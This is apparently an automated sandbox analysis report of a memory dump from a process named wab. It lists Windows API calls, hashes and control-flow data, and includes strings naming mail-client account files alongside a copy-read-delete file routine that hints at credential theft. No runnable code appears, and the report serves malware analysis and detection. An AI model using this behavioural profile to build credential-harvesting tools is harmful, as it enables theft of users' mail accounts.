                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2152742572-0
                                                                                                                                                                                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                          • Instruction ID: 006540df36636062ffea7f3f863258c72bcbc16ece67d322690ce926c8e3daa3
                                                                                                                                                                                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                          • Instruction Fuzzy Hash: E3F0C2A59893C07CFA1145B40C65EF69FCC8B676B3B109A56F1C0C7283DCA5B50683F6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,374D924F,?,00000000,?,00000000,?,374D9276,?,00000007,?,?,374D7E5A,?), ref: 374D5734
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,374D924F,?,00000000,?,00000000,?,374D9276,?,00000007,?,?,374D7E5A,?,?), ref: 374D5746
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
• Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                          • Opcode ID: 447073aa689066b1e14a0db4de85214dce73ba71993b95c56e48f7863b8b9fc0
                                                                                                                                                                                          • Instruction ID: f0c7d630e4ad9901f909935da7d441d8ad7be37bb8cd693b7022c3461e9cad4f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 447073aa689066b1e14a0db4de85214dce73ba71993b95c56e48f7863b8b9fc0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 35E08631540204EBDB116FA0D81D7C97B98BB846A5F100025F68CA6152DA38B541CB45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 374D2645
                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 374D2710
                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 374D2730
                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 374D273A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
• Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                          • Opcode ID: 3a8c9c0a58ebe0be9ab4ac8e9df9326fe737d6378bec1cebc18dbd204f57c31b
                                                                                                                                                                                          • Instruction ID: 04a8b038483ba4f4f3c9b47516b2137daa10db52d9651934d5cf26364b10a080
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a8c9c0a58ebe0be9ab4ac8e9df9326fe737d6378bec1cebc18dbd204f57c31b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 30314A75D4531DDBDB11DFA0C9897CDBBB8AF08304F1040AAE44CAB251EB74AA86CF45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 374D2276
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 374D2285
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 374D228E
                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 374D229B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
• Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                          • Opcode ID: a0dbe265310c2ecbe321e373a88112dda145dee917c348f7e07fb992233f021d
                                                                                                                                                                                          • Instruction ID: d2eb80b09369b2aa815157022f9f91e527b05eef13043f78eb06c4c9b289b0f8
                                                                                                                                                                                          • Opcode Fuzzy Hash: a0dbe265310c2ecbe321e373a88112dda145dee917c348f7e07fb992233f021d
                                                                                                                                                                                          • Instruction Fuzzy Hash: B8F09D70C10208EBCF01DBB0C54AA9EBBF8EF48209F5184969402F6101E638AB068F50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,374D2C3B,374DD1DC,00000017), ref: 374D2B21
                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(374DD1DC,?,374D2C3B,374DD1DC,00000017), ref: 374D2B2A
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409,?,374D2C3B,374DD1DC,00000017), ref: 374D2B35
                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,374D2C3B,374DD1DC,00000017), ref: 374D2B3C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
• Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3231755760-0
                                                                                                                                                                                          • Opcode ID: 99ee4d88fb70834085a514620ff861c9f611ef34a44c5b5e84a536dda799b5c7
                                                                                                                                                                                          • Instruction ID: e4d24de2d40244ffd553c0e9c9660a491833a72b704739f80d7dfb77f0e9c206
                                                                                                                                                                                          • Opcode Fuzzy Hash: 99ee4d88fb70834085a514620ff861c9f611ef34a44c5b5e84a536dda799b5c7
                                                                                                                                                                                          • Instruction Fuzzy Hash: F9D012318C4204EBC7026BE0CD0EB593F2CEB8531AF004002F749B2042CB39A403CF51
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 374D61DA
                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 374D61E4
                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 374D61F1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
• Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                          • Opcode ID: 8ad99c00da1d7c8496e408275e9ee6fe62839de80e75594e554095d42f1d1593
                                                                                                                                                                                          • Instruction ID: 223433f12845213d3e7419f54743e3c1adf3ba689efc6a6909830860cbcd4123
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ad99c00da1d7c8496e408275e9ee6fe62839de80e75594e554095d42f1d1593
                                                                                                                                                                                          • Instruction Fuzzy Hash: B431D37494122CDBCB21DF24D9887CDBBB8AF48360F5041DAE85CA7261E734AB828F45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,374D4A8A,?,374E2238,0000000C,374D4BBD,00000000,00000000,00000001,374D2082,374E2108,0000000C,374D1F3A,?), ref: 374D4AD5
                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,374D4A8A,?,374E2238,0000000C,374D4BBD,00000000,00000000,00000001,374D2082,374E2108,0000000C,374D1F3A,?), ref: 374D4ADC
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 374D4AEE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
• Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 374D294C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
• Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2325560087-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
• Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 374D1D1B
                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 374D1D37
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 374D1D4B
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 374D1D58
                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 374D1D72
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 374D1D7D
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 374D1D8A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
• Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1454806937-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph (374d39be to 374d3a80): nodes reference LoadLibraryExW, GetLastError, FreeLibrary and calls to 374d55f6.
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
• Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                          • API String ID: 0-537541572
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 374D1038
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 374D104B
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 374D1061
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 374D1075
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 374D1090
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 374D10B8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
• Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3594823470-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 374D1E89: lstrlenW.KERNEL32(?,?,?,?,?,374D10DF,?,?,?,00000000), ref: 374D1E9A
                                                                                                                                                                                            • Part of subcall function 374D1E89: lstrcatW.KERNEL32(?,?), ref: 374D1EAC
                                                                                                                                                                                            • Part of subcall function 374D1E89: lstrlenW.KERNEL32(?,?,374D10DF,?,?,?,00000000), ref: 374D1EB3
                                                                                                                                                                                            • Part of subcall function 374D1E89: lstrlenW.KERNEL32(?,?,374D10DF,?,?,?,00000000), ref: 374D1EC8
                                                                                                                                                                                            • Part of subcall function 374D1E89: lstrcatW.KERNEL32(?,374D10DF), ref: 374D1ED3
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 374D122A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
• Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$lstrcat$AttributesFile
                                                                                                                                                                                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                          • API String ID: 1475205934-1520055953
                                                                                                                                                                                          • Opcode ID: 3576a8a626bc692d6fcebb643365370dd2f2193b5bb7bd028d3e25ceb210b67f
                                                                                                                                                                                          • Instruction ID: 53cca6a098d1e3d672c3f0f4388a5eb06eae2857d90b1d4f5fb00df87663432b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3576a8a626bc692d6fcebb643365370dd2f2193b5bb7bd028d3e25ceb210b67f
                                                                                                                                                                                          • Instruction Fuzzy Hash: A721D7B9E50208AAEB109790DC91FEE7339EF80715F10055AFA04EB1D1E6B53D81875A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          control_flow_graph 306 374d4b39-374d4b61 GetModuleHandleExW 307 374d4b86-374d4b8a 306->307 308 374d4b63-374d4b76 GetProcAddress 306->308 311 374d4b8c-374d4b8f FreeLibrary 307->311 312 374d4b95-374d4ba2 call 374d2ada 307->312 309 374d4b78-374d4b83 308->309 310 374d4b85 308->310 309->310 310->307 311->312
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,374D4AEA,?,?,374D4A8A,?,374E2238,0000000C,374D4BBD,00000000,00000000), ref: 374D4B59
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 374D4B6C
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,374D4AEA,?,?,374D4A8A,?,374E2238,0000000C,374D4BBD,00000000,00000000,00000001,374D2082), ref: 374D4B8F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
• Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                          • Opcode ID: 5eb0d86100fd5b8f554e6cc91a68b886891c14eac1f938381df6a24747fe14ed
                                                                                                                                                                                          • Instruction ID: 7b3ec074b09f60ebf465ebf20ceaac53ead058ff37c1a3f8d2d3aade8a87b7b3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eb0d86100fd5b8f554e6cc91a68b886891c14eac1f938381df6a24747fe14ed
                                                                                                                                                                                          • Instruction Fuzzy Hash: 22F08C31940108FBCB029FA4CC19BEDBFB9EF48265F4041A9E845B6252DB34B942CE91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          control_flow_graph 316 374d9492-374d94ef GetConsoleCP 317 374d94f5-374d9511 316->317 318 374d9632-374d9644 call 374d2ada 316->318 319 374d952c-374d953d call 374d7c19 317->319 320 374d9513-374d952a 317->320 327 374d953f-374d9542 319->327 328 374d9563-374d9565 319->328 322 374d9566-374d9575 call 374d79e6 320->322 322->318 330 374d957b-374d959b WideCharToMultiByte 322->330 331 374d9609-374d9628 327->331 332 374d9548-374d955a call 374d79e6 327->332 328->322 330->318 333 374d95a1-374d95b7 WriteFile 330->333 331->318 332->318 339 374d9560-374d9561 332->339 335 374d95b9-374d95ca 333->335 336 374d962a-374d9630 GetLastError 333->336 335->318 338 374d95cc-374d95d0 335->338 336->318 340 374d95fe-374d9601 338->340 341 374d95d2-374d95f0 WriteFile 338->341 339->330 340->317 343 374d9607 340->343 341->336 342 374d95f2-374d95f6 341->342 342->318 344 374d95f8-374d95fb 342->344 343->318 344->340
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,374D9C07,?,00000000,?,00000000,00000000), ref: 374D94D4
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 374D9590
                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,374D9C07,00000000,?,?,?,?,?,?,?,?,?,374D9C07,?), ref: 374D95AF
                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,374D9C07,00000000,?,?,?,?,?,?,?,?,?,374D9C07,?), ref: 374D95E8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
• Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileWrite$ByteCharConsoleMultiWide
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 977765425-0
                                                                                                                                                                                          • Opcode ID: 247afc1ecb322a6f1740388e9876982ab8884a5810ef757dc91a890956a429c2
                                                                                                                                                                                          • Instruction ID: c4c760d8c087b78525a778cb68a404ef268c1c4f8d3aef994a403728012b8067
                                                                                                                                                                                          • Opcode Fuzzy Hash: 247afc1ecb322a6f1740388e9876982ab8884a5810ef757dc91a890956a429c2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2751A5B1D40205AFDB00CFA4C8A5AEEBBF4EF09310F14455AE595F7292E630F942CB61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,374D10DF,?,?,?,00000000), ref: 374D1E9A
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 374D1EAC
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,374D10DF,?,?,?,00000000), ref: 374D1EB3
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,374D10DF,?,?,?,00000000), ref: 374D1EC8
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,374D10DF), ref: 374D1ED3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
• Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$lstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 493641738-0
                                                                                                                                                                                          • Opcode ID: bab4932a8c1e5e09c0a2dddc3bd649a0e515dae4aa8c1f07ed0338a66071ebff
                                                                                                                                                                                          • Instruction ID: 69ef5a9edde782cba5a12a56c45a84deca6a1898f9b08cd9b34a89de0c731d63
                                                                                                                                                                                          • Opcode Fuzzy Hash: bab4932a8c1e5e09c0a2dddc3bd649a0e515dae4aa8c1f07ed0338a66071ebff
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9EF0E976540110FBD2216719EC85EBF777CEFC5B74F00401AF948A31819B58784386B5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,374D190E,?,?,00000000,?,00000000), ref: 374D1643
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 374D165A
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,374D190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 374D1661
                                                                                                                                                                                          • lstrcatW.KERNEL32(00001008,?), ref: 374D1686
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
• Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcatlstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1475610065-0
                                                                                                                                                                                          • Opcode ID: b7c19b0d890893fbe0fe8be200e760cb2ad75a2f8c55af785913b7005d68ff3b
                                                                                                                                                                                          • Instruction ID: a7ac4fa60dd2478f260b0e211aa39698f74f2b79eec897e823473386cbf1be6b
                                                                                                                                                                                          • Opcode Fuzzy Hash: b7c19b0d890893fbe0fe8be200e760cb2ad75a2f8c55af785913b7005d68ff3b
                                                                                                                                                                                          • Instruction Fuzzy Hash: F921B636A00204ABD705DB58EC95EEE77B8EFC9724F14401FE944BB142EB38B542C7A6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 374D715C
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 374D717F
                                                                                                                                                                                            • Part of subcall function 374D56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 374D5702
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 374D71A5
                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 374D71C7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
• Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
